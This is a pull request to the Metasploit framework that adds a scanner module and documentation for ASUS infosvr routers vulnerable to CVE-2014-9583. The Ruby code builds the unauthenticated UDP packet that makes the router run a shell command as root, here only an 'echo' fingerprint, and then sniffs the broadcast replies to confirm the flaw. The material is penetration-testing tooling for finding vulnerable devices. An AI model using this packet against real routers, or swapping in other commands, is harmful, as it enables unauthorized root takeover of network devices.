### PR TITLE
Add ASUS infosvr Auth Byass Scanner module

### DIFF
--- a/documentation/modules/auxiliary/scanner/misc/asus_infosvr.md
+++ b/documentation/modules/auxiliary/scanner/misc/asus_infosvr.md
@@ -1,0 +1,41 @@
+## Description
+
+  This module discovers ASUS infosvr servers vulnerable to unauthenticated remote command execution (CVE-2014-9583).
+
+
+## Vulnerable Application
+
+  The ASUS infosvr service is enabled by default on various models of ASUS routers and listens on the LAN interface on UDP port 9999. Unpatched versions of this service allow unauthenticated remote command execution as the `root` user.
+
+  This module broadcasts infosvr packets on UDP port 9999 in an attempt to execute the `echo` operating system command with a unique string. Vulnerable servers will execute the command and broadcast the results to `255.255.255.255` on port 9999. This module inspects broadcast traffic on port 9999 to infer vulnerable services based on the presence of the unique string.
+
+  This module was tested successfully on an ASUS RT-N12E with firmware version 2.0.0.35.
+
+  Numerous ASUS models are [reportedly affected](https://github.com/jduck/asus-cmd), but untested.
+
+
+## Verification Steps
+
+  To test this module, you must make sure there is at least one vulnerable infosvr service on the same network.
+
+  1. Start `msfconsole`
+  2. Do: `use auxiliary/scanner/misc/asus_infosvr`
+  3. Do: `set RHOSTS [IP]` (Default: `255.255.255.255`)
+  4. Do: `run`
+  5. You should be notified of any vulnerable infosvr servers on the local subnet
+
+
+## Scenarios
+
+  ```
+  msf > use auxiliary/scanner/misc/asus_infosvr 
+  msf auxiliary(scanner/misc/asus_infosvr) > set rhosts 255.255.255.255
+  rhosts => 255.255.255.255
+  msf auxiliary(scanner/misc/asus_infosvr) > run
+
+  [*] Sending requests to 1 hosts...
+  [+] 10.1.1.1:9999 is VULNERABLE
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
+

--- a/modules/auxiliary/scanner/misc/asus_infosvr.rb
+++ b/modules/auxiliary/scanner/misc/asus_infosvr.rb
@@ -1,0 +1,118 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Capture
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::UDPScanner
+
+  def initialize
+    super(
+      'Name'           => 'ASUS infosvr Scanner',
+      'Description'    => 'Discover ASUS infosvr servers vulnerable to CVE-2014-9583.',
+      'Author'         => [
+        'Friedrich Postelstorfer', # Initial public disclosure and Python exploit
+        'jduck', # Independent discovery and C exploit
+        'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+      ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => 'Jan 4 2015',
+      'References'     => [
+          ['CVE', '2014-9583'],
+          ['EDB', '35688'],
+          ['URL', 'https://github.com/jduck/asus-cmd']
+      ])
+    register_options [
+      Opt::RPORT(9999),
+      OptAddressRange.new('RHOSTS', [true, 'The broadcast address or CIDR range of targets to query', '255.255.255.255'])
+    ]
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def request
+    pkt = ''
+    # ServiceID   [byte]      ; NET_SERVICE_ID_IBOX_INFO
+    pkt << "\x0C"
+    # PacketType  [byte]      ; NET_PACKET_TYPE_CMD
+    pkt << "\x15"
+    # OpCode      [word]      ; NET_CMD_ID_MANU_CMD
+    pkt << "\x33\x00"
+    # Info        [dword]     ; Comment: "Or Transaction ID"
+    pkt << Rex::Text.rand_text_alphanumeric(4)
+    # MacAddress  [byte[6]]   ; Double-wrongly "checked" with memcpy instead of memcmp
+    pkt << Rex::Text.rand_text_alphanumeric(6)
+    # Password    [byte[32]]  ; Not checked at all
+    pkt << "\x00" * 32
+    # Command Length + \x00 + Command padded to 512 bytes
+    pkt << ([@cmd.length].pack('C') + "\x00" + @cmd).ljust((512 - pkt.length), "\x00")
+  end
+
+  def scan_host(ip)
+    vprint_status "Sending request to #{ip}:#{rport}"
+    scanner_send request, ip, rport
+  end
+
+  def scanner_prescan(batch)
+    @fingerprint = Rex::Text.rand_text_alphanumeric(rand(10) + 10)
+    @cmd = "echo #{@fingerprint}"
+
+    print_status "Sending requests to #{batch.length} hosts..."
+
+    @results = []
+
+    open_pcap 'SNAPLEN' => 128,
+              'FILTER' => "udp and src port #{rport} and dst port #{rport}"
+
+    @t = Thread.new do
+      begin
+        each_packet do |pkt|
+          res = parse_packet pkt
+          @results << res unless res.nil?
+        end
+      rescue ::Interrupt
+        raise $!
+      ensure
+        close_pcap
+      end
+    end
+  end
+
+  def scanner_postscan(_batch)
+    @t.kill
+
+    if @results.empty?
+      print_status 'No infosvr services found.'
+      return
+    end
+
+    found = {}
+    @results.uniq.each do |pkt|
+      ip = IPAddr.new(pkt.ip_src, Socket::AF_INET).to_s
+      next if found[ip]
+
+      print_good "#{ip}:#{rport} is VULNERABLE"
+
+      report_service(host: ip, port: rport, proto: 'udp', name: 'infosvr', info: pkt.payload.to_s)
+      found[ip] = true
+    end
+  end
+
+  def parse_packet(pkt)
+    p = PacketFu::Packet.parse pkt
+    return unless p.is_eth?
+    return unless p.is_ip?
+    return unless p.is_udp?
+    return unless p.udp_src == 9999
+    return unless p.udp_dst == 9999
+    return unless IPAddr.new(p.ip_dst, Socket::AF_INET).to_s == '255.255.255.255'
+    return unless p.payload.to_s.match?(/#{@fingerprint}/)
+    p
+  rescue
+    nil
+  end
+end

--- a/modules/auxiliary/scanner/misc/asus_infosvr.rb
+++ b/modules/auxiliary/scanner/misc/asus_infosvr.rb
@@ -97,7 +97,14 @@ class MetasploitModule < Msf::Auxiliary
 
       print_good "#{ip}:#{rport} is VULNERABLE"
 
-      report_service(host: ip, port: rport, proto: 'udp', name: 'infosvr', info: pkt.payload.to_s)
+      report_service host: ip, port: rport, proto: 'udp', name: 'infosvr'
+      report_vuln host: ip,
+                  port: rport,
+                  proto: 'udp',
+                  name: 'infosvr',
+                  info: "Module #{self.fullname} confirmed remote command execution via this ASUS infosvr service",
+                  refs: self.references,
+                  exploited_at: Time.now.utc
       found[ip] = true
     end
   end

--- a/modules/auxiliary/scanner/misc/asus_infosvr_auth_bypass.rb
+++ b/modules/auxiliary/scanner/misc/asus_infosvr_auth_bypass.rb
@@ -10,8 +10,11 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'           => 'ASUS infosvr Scanner',
-      'Description'    => 'Discover ASUS infosvr servers vulnerable to CVE-2014-9583.',
+      'Name'           => 'ASUS infosvr Auth Bypass Scanner',
+      'Description'    => %q{
+        Discover ASUS infosvr servers on the local subnet vulnerable to
+        authentication bypass.
+      },
       'Author'         => [
         'Friedrich Postelstorfer', # Initial public disclosure and Python exploit
         'jduck', # Independent discovery and C exploit


### PR DESCRIPTION
This PR adds an ASUS infosvr Scanner module.

This module discovers ASUS infosvr servers vulnerable to CVE-2014-9583.


## Verification

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/misc/asus_infosvr`
- [ ] `set RHOSTS 255.255.255.255`
- [ ] `run`

## Example Output

```
msf auxiliary(asus_infosvr) > set rhosts 10.1.1.1/24 10.0.0.0/24 255.255.255.255
rhosts => 10.1.1.1/24 10.0.0.0/24 255.255.255.255
[*] Sending requests to 256 hosts...
[*] Sending requests to 256 hosts...
[*] Sending requests to 1 hosts...
[+] 10.1.1.1:9999 is VULNERABLE
[*] No infosvr services found.
[+] 10.1.1.1:9999 is VULNERABLE
[*] Scanned 513 of 513 hosts (100% complete)
[*] Auxiliary module execution completed
```

The output is silly (reports a host, then reports no hosts were found, then reports the same host again) due to the way batch scanning works. This is typical of all module which make use of the UDPScanner when specifying more than one host or host range in `RHOSTS`.

